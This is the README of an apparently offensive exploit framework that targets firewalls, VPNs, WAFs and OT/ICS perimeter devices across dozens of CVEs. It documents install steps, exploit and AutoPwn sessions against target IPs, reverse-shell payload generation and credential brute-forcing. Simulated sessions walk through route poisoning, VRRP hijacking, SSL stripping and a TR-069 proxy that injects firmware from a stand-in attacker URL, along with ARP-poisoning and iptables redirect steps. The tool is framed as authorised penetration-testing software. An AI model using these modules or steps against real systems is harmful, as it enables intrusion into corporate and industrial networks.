mrhenrike/FirewallXPL-Forge

# FirewallXPL-Forge **边界安全漏洞利用框架** — 包含 164 个模块，涵盖来自 **23 个供应商**和 **51+ 个 CVE** 的 **FW, NGFW, UTM, WAF, VPN, NAC, LB** 以及 **OT/ICS** 工业防火墙。 **作者：** André Henrique ([@mrhenrike](https://github.com/mrhenrike)) \| [União Geek](https://github.com/Uniao-Geek) **语言：** **英语 (en-US)** — 默认。**葡萄牙语 (pt-BR)：** [README.pt-BR.md](README.pt-BR.md) [](https://www.python.org/downloads/) [](https://github.com/mrhenrike/FirewallXPL-Forge/actions) [](https://pypi.org/project/firewallxpl/) ## 架构与攻击面映射图  ## 安装 ``` # 从 PyPI（推荐） pip install firewallxpl # 带 Rich TUI + Nmap discovery pip install firewallxpl[tui,discovery] # 带 ML engine + GPU acceleration pip install firewallxpl[ml,gpu-nvidia] # 全部 pip install firewallxpl[full] # 从 source git clone https://github.com/mrhenrike/FirewallXPL-Forge.git cd FirewallXPL-Forge pip install -e ".[tui,discovery]" python fxf.py ``` ### 环境诊断 ``` python tools/env_doctor.py ``` ## 项目功能 FirewallXPL-Forge 提供针对边界设备（渗透测试、实验室、受控红队）进行**授权**安全测试的**模块**。目标类别：`perimeter`, `waf`, `vpn`, `nac`, `lb`。 | 类型 | 作用 | |------|------| | **exploits** | 滥用已知漏洞 — 每个模块包含 `check()` + `run()` | | **creds** | 针对 SSH, FTP, Telnet, HTTP, SNMP 的默认凭据和暴力破解 | | **scanners** | 弱点识别；**AutoPwn** 使用类似 Nmap 的时序控制 (T0–T5) 编排所有模块 | | **payloads** | 按架构生成 Payload (ARM/MIPS/x86/x64，reverse/bind shell) | | **encoders** | Payload 编码 (Python, PHP, Perl) | | **generic** | 跨领域通用工具：CVE 查找、SNMP、SSDP、字典生成器 | **范围之外：** IP 摄像头、打印机、DVR、消费级路由器。 ## 供应商覆盖范围（23 家供应商，51+ 个 CVE） ### IT 安全设备 | 供应商 | 模块数 | 关键 CVE | |--------|---------|----------| | Fortinet FortiOS/FortiGate | 9 | CVE-2018-13379, CVE-2022-40684, CVE-2024-21762, CVE-2024-47575 | | Cisco ASA/FTD/IOS XE | 4 | CVE-2020-3452, CVE-2023-20198, CVE-2023-20269 | | Palo Alto PAN-OS | 6 | **CVE-2026-0257** (auth bypass CISA KEV 2026-05-29), CVE-2024-0012, CVE-2024-3400, CVE-2025-0108 | | F5 BIG-IP | 6 | CVE-2020-5902, CVE-2022-1388, CVE-2023-46747 | | Citrix/NetScaler | 3 | CVE-2019-19781, CVE-2023-3519, CVE-2023-4966 | | SonicWall | 6 | CVE-2020-5135, CVE-2024-40766, CVE-2024-53704 | | Ivanti/Pulse Secure | 3 | CVE-2019-11510, CVE-2023-46805+21887, CVE-2025-0282 | | Juniper SRX/EX | 2 | CVE-2023-36845, CVE-2024-21591 | | Sophos XG | 3 | CVE-2020-12271, CVE-2022-1040, CVE-2022-3236 | | Check Point | 1 | CVE-2024-24919 | | WatchGuard | 2 | XCS RCE, CVE-2022-23176 | | Zyxel USG | 3 | CVE-2022-30525, CVE-2023-28771, CVE-2023-33009 | | pfSense | 3 | CVE-2022-31814, CVE-2023-27100, CVE-2023-42326 | | Barracuda | 3 | CVE-2023-2868, CVE-2023-7102, SecureSphere SQLi | ### OT/ICS 工业防火墙 | 供应商 | 模块数 | 关键 CVE | |--------|---------|----------| | Siemens SCALANCE/SINEMA/RUGGEDCOM | 3 | CVE-2022-32257, CVE-2023-24845, CVE-2023-44373 | | Moxa EDR | 2 | CVE-2024-9137 (CVSS 9.9), CVE-2024-9138 | | Hirschmann EAGLE | 1 | CVE-2020-6994 | | Phoenix Contact mGuard | 1 | CVE-2024-43386 | | Schneider ConneXium/Tofino | 1 | CVE-2017-6026 | | Cisco ISA-3000 | 1 | CVE-2018-0101 (CVSS 10.0) | | Secomea GateManager | 1 | CVE-2020-14500 (CVSS 10.0) | | Ewon/HMS Cosy+ | 1 | CVE-2026-25823 | ### OT 协议绕过 Modbus TCP, OPC UA, DNP3, IEC 60870-5-104, EtherNet/IP CIP ### 通用技术 HTTP Request Smuggling, VLAN Hopping, Heartbleed, Shellshock, SSH Auth Keys ## 使用方法 ### 交互式 shell ``` python fxf.py ``` ``` fxf > use exploits/perimeter/fortinet/fortios_sslvpn_path_traversal_cve_2018_13379 fxf (...) > set target 192.168.1.1 fxf (...) > check [+] Target is vulnerable fxf (...) > run ``` ### 结合 ML 的 AutoPwn ``` fxf > use scanners/autopwn fxf (scanners/autopwn) > set target 192.168.1.1 fxf (scanners/autopwn) > set timing_template aggressive fxf (scanners/autopwn) > set ml_advisor true fxf (scanners/autopwn) > set ml_fingerprint true fxf (scanners/autopwn) > run ``` ### 非交互模式 ``` python fxf.py -m exploits/perimeter/fortinet/fortios_auth_bypass_cve_2022_40684 -s "target 10.0.0.1" ``` ### 搜索 ``` fxf > search fortinet fxf > search type=exploits vendor=cisco fxf > search CVE-2024 fxf > search cve_2026_0257 ``` ### NSE 脚本安装程序 将内置的特定防火墙 Nmap 脚本安装到你的 nmap 脚本目录： ``` # 交互式 fxf > install-nse # 非交互式（要求 PATH 中包含 nmap） python fxf.py -c "install-nse" # 自定义 path 或 dry-run python fxf.py -c "install-nse --path /usr/local/share/nmap/scripts" python fxf.py -c "install-nse --check" ``` **内置脚本：** | 脚本 | 用途 | |--------|---------| | `fxf-firewall-fingerprint.nse` | 通用防火墙指纹识别（11 家供应商） | | `fxf-globalprotect-detect.nse` | Palo Alto GlobalProtect portal/gateway 检测 | | `fxf-globalprotect-auth-bypass-cve-2026-0257.nse` | CVE-2026-0257 被动预检 | | `fxf-fortios-detect.nse` | Fortinet FortiOS 检测 | | `fxf-cisco-asa-detect.nse` | Cisco ASA/FTD 检测 | ``` # 安装完成后：直接使用 nmap nmap -p 443 --script fxf-globalprotect-auth-bypass-cve-2026-0257 nmap -p 443,80,8443 --script fxf-firewall-fingerprint 192.168.0.0/24 ``` 有关完整的 NSE 参考，请参阅 [docs/wiki/en-US/12-nse-scripts.md](docs/wiki/en-US/12-nse-scripts.md)。 ## 核心引擎 | 引擎 | 描述 | |--------|-------------| | **异步并发** | asyncio + ThreadPool（最多 300 个线程）+ ProcessPool + ConnectionPool + Pipeline | | **GPU 加速** | NVIDIA CUDA, AMD ROCm, Intel oneAPI, Apple Metal, OpenCL，CPU 回退支持 | | **ML 引擎** | ServiceFingerprinter, AttackOptimizer (Thompson Sampling), AnomalyDetector, AutoTuner, CredentialMutator | | **网络发现** | Nmap/Masscan 集成 + 内置 TCP 回退 + 设备识别（23 家供应商）+ 漏洞映射 | | **Rich TUI** | 样式化横幅、面板、表格、进度条、全屏仪表板 | ## 兼容性 | 平台 | 状态 | |----------|--------| | Windows 10/11 | CI + 本地验证 | | WSL / Debian / Ubuntu | CI + 本地验证 | | Kali Linux | 本地验证 | | macOS | CI | **Python：** 3.9 至 3.13。包含针对 3.13+ 移除的 `telnetlib` 的兼容垫片。 ## 文档 - **Wiki (en-US + pt-BR)：** [github.com/mrhenrike/FirewallXPL-Forge/wiki](https://github.com/mrhenrike/FirewallXPL-Forge/wiki) - **覆盖矩阵：** [docs/COVERAGE_MATRIX.md](docs/COVERAGE_MATRIX.md) - **完整目录：** [docs/FULL_CATALOG.md](docs/FULL_CATALOG.md) ## BLOCO J - 攻击类别 (v2.0.0) ### 路由攻击 ``` fxf > use exploits/routing/rip_v1_poison fxf (RIPv1Poison) > set src_ip 192.168.1.100 fxf (RIPv1Poison) > set poison_network 0.0.0.0 fxf (RIPv1Poison) > set metric 1 fxf (RIPv1Poison) > set destination 255.255.255.255 fxf (RIPv1Poison) > set simulate true fxf (RIPv1Poison) > run [SIMULATE] Would send RIPv1 Response to 255.255.255.255:520 [SIMULATE] Network: 0.0.0.0 (default route) metric=1 next-hop=192.168.1.100 [SIMULATE] Payload (24 bytes): 0201000000020000... [SIMULATE] Exploits CVE-1999-0111: RIPv1 has no authentication [SIMULATE] Effect: routers accepting unauthenticated RIPv1 install default route via attacker [!] Set simulate false + destructive true to execute ``` ``` fxf > use exploits/routing/vrrp_hijack fxf (VRRPHijack) > set src_ip 192.168.1.100 fxf (VRRPHijack) > set vrid 1 fxf (VRRPHijack) > set virtual_ip 192.168.1.1 fxf (VRRPHijack) > set priority 255 fxf (VRRPHijack) > set simulate true fxf (VRRPHijack) > run [SIMULATE] Would send 5 VRRP Advertisement(s) [SIMULATE] VRID=1 priority=255 virtual_ip=192.168.1.1 advert_int=1s [SIMULATE] src=192.168.1.100 -> dst=224.0.0.18 (IP proto 112) [SIMULATE] VRRP payload (16 bytes): 21012001... [SIMULATE] Effect: current VRRP master yields; attacker becomes active router for 192.168.1.1 [!] PREREQ: Scapy + raw socket privileges (Linux root) or Windows admin ``` | 模块 | 路径 | 影响 | 参考 | |--------|------|--------|-----------| | `rip_v1_poison` | `exploits/routing/` | HIGH | CVE-1999-0111, RFC 1058 | | `vrrp_hijack` | `exploits/routing/` | HIGH | RFC 3768, MITRE T1557 | ### MiTM 代理 ``` fxf > use exploits/mitm/tr069_mitm_proxy fxf (TR069MiTM) > set acs_host 10.0.0.1 fxf (TR069MiTM) > set acs_port 7547 fxf (TR069MiTM) > set listen_port 7547 fxf (TR069MiTM) > set inject_mode firmware fxf (TR069MiTM) > set firmware_url http://attacker/malicious.bin fxf (TR069MiTM) > set simulate true fxf (TR069MiTM) > run [SIMULATE] Would bind CWMP proxy on 0.0.0.0:7547 [SIMULATE] Upstream ACS: 10.0.0.1:7547 (ssl=False) [SIMULATE] Injection mode: inject Download RPC pointing to http://attacker/malicious.bin [SIMULATE] Setup required: [SIMULATE] 1. ARP poison CPE to redirect port 7547 to attacker [SIMULATE] 2. iptables -t nat -A PREROUTING -p tcp --dport 7547 -j REDIRECT --to-port 7547 [!] Set simulate false + destructive true to start proxy ``` ``` fxf > use exploits/mitm/ssl_strip_embedded fxf (SSLStrip) > set target 192.168.1.1 fxf (SSLStrip) > set target_port 443 fxf (SSLStrip) > set listen_port 10080 fxf (SSLStrip) > set simulate true fxf (SSLStrip) > run [SIMULATE] Would bind SSL strip proxy on 0.0.0.0:10080 [SIMULATE] Upstream target: 192.168.1.1:443 (use_ssl_upstream=True) [SIMULATE] All HTTPS references stripped to HTTP in responses [SIMULATE] Credentials, cookies, and auth headers logged in plaintext [SIMULATE] Setup required: [SIMULATE] 1. ARP poison target: arp -s [SIMULATE] 2. iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10080 [!] Set simulate false + destructive true to start proxy ``` | 模块 | 路径 | 影响 | 参考 | |--------|------|--------|-----------| | `tr069_mitm_proxy` | `exploits/mitm/` | CRITICAL | TR-069 Amendment 6, CVE-2014-9222 | | `ssl_strip_embedded` | `exploits/mitm/` | HIGH | BlackHat DC 2009 (Marlinspike), MITRE T1557.002 | ### 覆盖范围摘要 | 类别 | 模块 | 默认模式 | |----------|---------|-------------| | 路由攻击 | `rip_v1_poison`, `vrrp_hijack` | simulate=True | | MiTM 代理 | `tr069_mitm_proxy`, `ssl_strip_embedded` | simulate=True | | 边界漏洞利用 | `fortios_sslvpn_session_reuse`, `cisco_asa_ftd_firestarter_chain`, + 10+ | simulate=True | | 凭据 | `perimeter_auth_bruteforce` | simulate=True | 所有模块默认为 `simulate=True`。实际执行需要在检查模拟输出后显式设置 `destructive=True`。 ## 治理 | 英语（默认） | 葡萄牙语 (pt-BR) | |-------------------|---------------------| | [CONTRIBUTING.md](CONTRIBUTING.md) | [CONTRIBUTING.pt-BR.md](CONTRIBUTING.pt-BR.md) | | [CODE_OF_CONDUCT.md](CODE_OF_CONDUCT.md) | [CODE_OF_CONDUCT.pt-BR.md](CODE_OF_CONDUCT.pt-BR.md) | | [SECURITY.md](SECURITY.md) | [SECURITY.pt-BR.md](SECURITY.pt-BR.md) | | [CONTRIBUTORS.md](CONTRIBUTORS.md) | [CONTRIBUTORS.pt-BR.md](CONTRIBUTORS.pt-BR.md) | ## 许可证 BSD — 见 [LICENSE](LICENSE)。

标签：CISA项目, CTI, Docker部署, PKINIT, Python, SOC, Vectored Exception Handling, Veh, 工控安全, 插件系统, 无后门, 渗透测试框架, 计算机取证, 边界安全, 逆向工具, 防御, 防火墙